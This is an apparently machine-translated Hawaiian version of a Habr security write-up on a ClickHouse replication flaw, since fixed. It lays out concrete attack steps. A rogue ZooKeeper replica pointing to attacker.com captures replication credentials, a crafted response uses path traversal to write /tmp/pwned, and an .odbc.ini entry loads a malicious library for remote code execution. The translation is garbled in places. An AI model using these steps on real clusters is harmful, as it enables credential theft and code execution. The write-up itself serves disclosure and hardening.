E haʻi ana kēia ʻatikala i ka moʻolelo o kahi nāwaliwali kikoʻī loa i ka protocol replication ClickHouse, a e hōʻike pū ana hoʻi pehea e hoʻonui ʻia ai ka ʻili hoʻouka.
ʻO ClickHouse kahi waihona no ka mālama ʻana i nā puke nui o ka ʻikepili, ʻoi aku ka hoʻohana pinepine ʻana ma mua o hoʻokahi kope. Kūkulu ʻia ka Clustering a me ka replication ma ClickHouse ma luna (ZK) a koi i nā kuleana kākau.
ʻAʻole pono ka hoʻonohonoho ZK paʻamau i ka hōʻoia, no laila ua loaʻa i ka lehulehu nā kaukani ZK server e hoʻonohonoho iā Kafka, Hadoop, ClickHouse.
No ka hōʻemi ʻana i kāu ʻaoʻao hoʻouka, pono ʻoe e hoʻonohonoho i ka hōʻoia a me ka ʻae i ka wā e hoʻokomo ai iā ZooKeeper
Aia kekahi mau deserializations Java e pili ana i nā lā 0, akā e noʻonoʻo e hiki i ka mea hoʻouka ke heluhelu a kākau iā ZooKeeper, i hoʻohana ʻia no ka hoʻopiʻi ʻana o ClickHouse.
Ke hoʻonohonoho ʻia i ke ʻano cluster, kākoʻo ʻo ClickHouse i nā nīnau i hāʻawi ʻia , e hele ana ma ZK - no lākou i hana ʻia nā node i ka pepa /clickhouse/task_queue/ddl.
No ka laʻana, hana ʻoe i kahi node /clickhouse/task_queue/ddl/query-0001 me ka ʻike:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']a ma hope o ia mea, e holoi ʻia ka papa hoʻāʻo ma nā kikowaena cluster host1 a me host2. Kākoʻo pū ʻo DDL i ka holo ʻana i nā nīnau CREATE/ALTER/DROP.
He kani weliweli? Akā ma hea e hiki ai i kahi mea hoʻouka ke loaʻa nā helu kikowaena?
hana ma ka pae o kēlā me kēia pākaukau, no laila ke hana ʻia kahi pākaukau ma ZK, ua kuhikuhi ʻia kahi kikowaena nāna e hoʻololi i nā metadata me nā replicas. No ka laʻana, i ka wā e hoʻokō ai i kahi noi (pono e hoʻonohonoho ʻia ʻo ZK, chXX - inoa o ke kope, pahupaʻa - papa inoa):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;e hana ʻia nā nodes kolamu и metadata.
ʻIke maʻiʻo /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpHiki ke hoʻohui i ka ʻikepili mai kēia pūʻulu? ʻAe, inā ʻo ka port replication (TCP/9009) ma ke kikowaena chXX-address ʻaʻole e pani ʻia ka pā ahi a ʻaʻole e hoʻonohonoho ʻia ka hōʻoia no ka hana hou ʻana. Pehea e kāʻalo ai i ka hōʻoia?
Hiki i ka mea hoʻouka ke hana i kahi kope hou ma ZK ma ke kope wale ʻana i nā ʻike mai /clickhouse/tables/01-01/foobar/replicas/chXX a hoololi i ke ano host.
ʻIke maʻiʻo /clickhouse/tables/01–01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpA laila pono ʻoe e haʻi i nā replicas ʻē aʻe aia kahi poloka hou o ka ʻikepili ma ke kikowaena o ka mea hoʻouka e pono ai lākou e lawe - ua hana ʻia kahi node ma ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX monotonically grow counter, ʻoi aku ka nui ma mua o ka mea hope ma ka log hanana):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2kahi kumu_hoopii - ka inoa o ke kope o ka mea hoʻouka kaua i hana ʻia ma ka pae mua, block_id - ka mea hōʻike poloka data, kiʻi - "loaʻa ka poloka" kauoha (a ).
A laila, heluhelu kēlā me kēia replica i kahi hanana hou i loko o ka log a hele i kahi kikowaena i hoʻomalu ʻia e ka mea hoʻouka e loaʻa i kahi poloka o ka ʻikepili (ʻo ka protocol replication he binary, e holo ana ma luna o HTTP). Server attacker.com e loaʻa nā noi:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXXkahi ʻo XXX ka ʻikepili hōʻoia no ka hana hou ʻana. I kekahi mau hihia, he moʻokāki paha kēia me ke komo ʻana i ka waihona ma o ka protocol ClickHouse nui a me ka protocol HTTP. E like me kāu i ʻike ai, ʻoi aku ka nui o ka hoʻouka kaua ʻana no ka mea ʻo ZooKeeper, i hoʻohana ʻia no ka hana hou ʻana, ua waiho ʻia me ka hoʻonohonoho ʻole ʻia.
E nānā i ka hana o ka loaʻa ʻana o kahi poloka o ka ʻikepili mai kahi kope, ua kākau ʻia me ka hilinaʻi piha aia nā replicas āpau ma lalo o ka mana kūpono a aia ka hilinaʻi ma waena o lākou.
pāʻālua hana hoʻopiʻi
Heluhelu ka hana i ka papa inoa o nā faila, a laila ko lākou mau inoa, ka nui, nā ʻike, a laila kākau iā lākou i ka ʻōnaehana faila. Pono e wehewehe kaʻawale i ke ʻano o ka mālama ʻana i ka ʻikepili i ka ʻōnaehana faila.
Aia kekahi mau subdirectories i loko /var/lib/clickhouse (ka papa kuhikuhi waihona paʻamau mai ka faila hoʻonohonoho):
nā hae - papa kuhikuhi no ka hoʻopaʻa ʻana , hoʻohana ʻia i ka hoʻihoʻi ʻana ma hope o ka nalowale ʻana o ka ʻikepili;
tmp - ka papa kuhikuhi no ka mālama ʻana i nā faila manawa;
mea hoʻohana_files - ua kaupalena ʻia nā hana me nā faila i kēia papa kuhikuhi (INTO OUTFILE a me nā mea ʻē aʻe);
metadata - nā faila sql me nā wehewehe papa;
preprocessed_configs - hoʻoponopono ʻia nā faila hoʻonohonoho derivative mai /etc/clickhouse-server;
ʻikepili - ka papa kuhikuhi maoli me ka ʻikepili ponoʻī, i kēia hihia no kēlā me kēia waihona i hana ʻia kahi subdirectory ʻokoʻa ma aneʻi (no ka laʻana /var/lib/clickhouse/data/default).
No kēlā me kēia pākaukau, hana ʻia kahi subdirectory ma ka papa kuhikuhi waihona. He waihona ʻokoʻa kēlā me kēia kolamu ma muli o . No ka laʻana no ka papaʻaina pahupaʻai hana ʻia e ka mea hoʻouka, e hana ʻia nā faila penei:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2Manaʻo ka replica e loaʻa nā faila me nā inoa like i ka wā e hana ai i kahi poloka o ka ʻikepili a ʻaʻole ia e hōʻoia iā lākou ma kekahi ʻano.
Ua lohe mua paha ka mea heluhelu e pili ana i ka hui ʻana o file_name i kahi hana WriteBufferFromFile. ʻAe, ʻae kēia i ka mea hoʻouka e kākau i nā ʻike kūʻokoʻa i kekahi faila ma ka FS me nā kuleana mea hoʻohana clickhouse. No ka hana ʻana i kēia, pono e hoʻihoʻi ka replica i hoʻomalu ʻia e ka mea hoʻouka i kēia pane i ka noi (ua hoʻohui ʻia nā laina laina no ka maʻalahi o ka hoʻomaopopo ʻana):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeepera ma hope o ka hui ʻana ../../../../../../../../../tmp/pwned e kākau ʻia ka faila /tmp/pwned me ka maʻiʻo hellofromzookeeper.
Nui nā koho no ka hoʻololi ʻana i ka hiki ke kākau faila i ka hoʻokō code mamao (RCE).
Nā puke wehewehe ʻōlelo waho ma RCE
Ma nā mana kahiko, ua mālama ʻia ka papa kuhikuhi me nā hoʻonohonoho ClickHouse me nā kuleana mea hoʻohana hale kaomi paʻamau. ʻO nā faila hoʻonohonoho he mau faila XML i heluhelu ʻia e ka lawelawe ma ka hoʻomaka ʻana a laila hūnā i loko /var/lib/clickhouse/preprocessed_configs. Ke hoʻololi ʻia, heluhelu hou ʻia. Inā loaʻa iā ʻoe ke komo i /etc/clickhouse-server hiki i ka mea hoʻouka ke hana i kāna iho ʻano hoʻokō a laila hoʻokō i ke code arbitrary. ʻAʻole hāʻawi nā mana o ClickHouse i kēia manawa i nā kuleana ma ke ʻano paʻamau, akā inā i hoʻonui mālie ʻia ke kikowaena, hiki ke waiho ʻia kēlā mau kuleana. Inā ʻoe e kākoʻo ana i kahi hui ClickHouse, e nānā i nā kuleana i ka papa kuhikuhi hoʻonohonoho, pono ia i ka mea hoʻohana root.
ODBC i RCE
Ke kau ʻana i kahi pūʻolo, hana ʻia kahi mea hoʻohana clickhouse, akā ʻaʻole i hana ʻia kāna papa kuhikuhi home /nonexistent. Eia nō naʻe, i ka hoʻohana ʻana i nā puke wehewehe ʻōlelo waho, a i ʻole no nā kumu ʻē aʻe, hana nā luna i kahi papa kuhikuhi /nonexistent a hāʻawi i ka mea hoʻohana clickhouse hiki ke kākau iā ia (SSZB! kokoke. mea unuhi).
Kākoʻo ʻo ClickHouse a hiki ke hoʻohui i nā waihona ʻikepili ʻē aʻe. Ma ODBC, hiki iā ʻoe ke kuhikuhi i ke ala i ka waihona mea hoʻokele waihona (.so). Ua ʻae nā mana kahiko o ClickHouse iā ʻoe e hana pololei i kēia ma ka mea nāna e noi, akā i kēia manawa ua hoʻohui ʻia kahi mākaʻikaʻi o ke kaula pili. odbc-bridge, no laila ʻaʻole hiki ke kuhikuhi i ke ala hoʻokele mai ka noi. Akā hiki i kahi mea hoʻouka ke kākau i ka papa kuhikuhi home me ka hoʻohana ʻana i ka nāwaliwali i hōʻike ʻia ma luna?
E hana kākou i faila ~/.odbc.ini me nā mea e like me kēia:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.soa laila ma ka hoʻomaka ʻana SELECT * FROM odbc('DSN=lalala', 'test', 'test'); e hoʻouka ʻia ka waihona test.so a loaʻa iā RCE (mahalo no ka piko).
Ua hoʻopaʻa ʻia kēia mau mea a me nā nāwaliwali ʻē aʻe ma ClickHouse version 19.14.3. E mālama i kāu ClickHouse a me ZooKeepers!
Source: www.habr.com